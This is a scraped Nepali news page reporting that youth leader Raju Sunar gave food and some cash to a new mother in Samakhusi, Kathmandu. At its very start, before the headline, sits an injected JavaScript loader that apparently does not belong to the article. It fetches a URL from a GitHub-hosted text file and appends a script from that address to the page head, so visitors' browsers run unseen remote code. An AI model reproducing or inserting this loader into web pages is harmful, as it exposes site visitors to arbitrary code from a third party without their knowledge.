;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सामाखुसीको एक सुत्केरी महिलालाई युवा नेता राजु सुनारले गरे सहयोग – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • सामाखुसीको एक सुत्केरी महिलालाई युवा नेता राजु सुनारले गरे सहयोग
समाचार

सामाखुसीको एक सुत्केरी महिलालाई युवा नेता राजु सुनारले गरे सहयोग

काठमाडौँ | नेपाली काँग्रेसका महाधिवेशन प्रतिनिधि,नेपाल दलित विद्यार्थी संघको केन्द्रीय अध्यक्ष एबम् युवा नेता राजु सुनारले काठमाडौं सामाखुशी रानीबारी, भाडामा बस्दै आउनुभएको सुत्केरीलाई खाद्यान्न सहयोग गरेका छन्।
सुत्केरी निमा तामाङ घिसिङको श्रीमान सम्पर्कमा नभएको पनि लामो समय भएको र आफू खाना अनि बच्चालाई खुवाउन निक्कै कठिन भएको अवस्थामा चामल, दाल, तेल, नुन, अण्डा र केही नगद समेत सहयोग गर्नु भएको छ।
डेढ महिना देखि निरन्तर मजदुर तथा विपन्न परिवारहरूलाई राहत बितरण गर्दै आउनुभएको कुरा सुनारले बताए।

फेसबुक प्रतिक्रियाहरु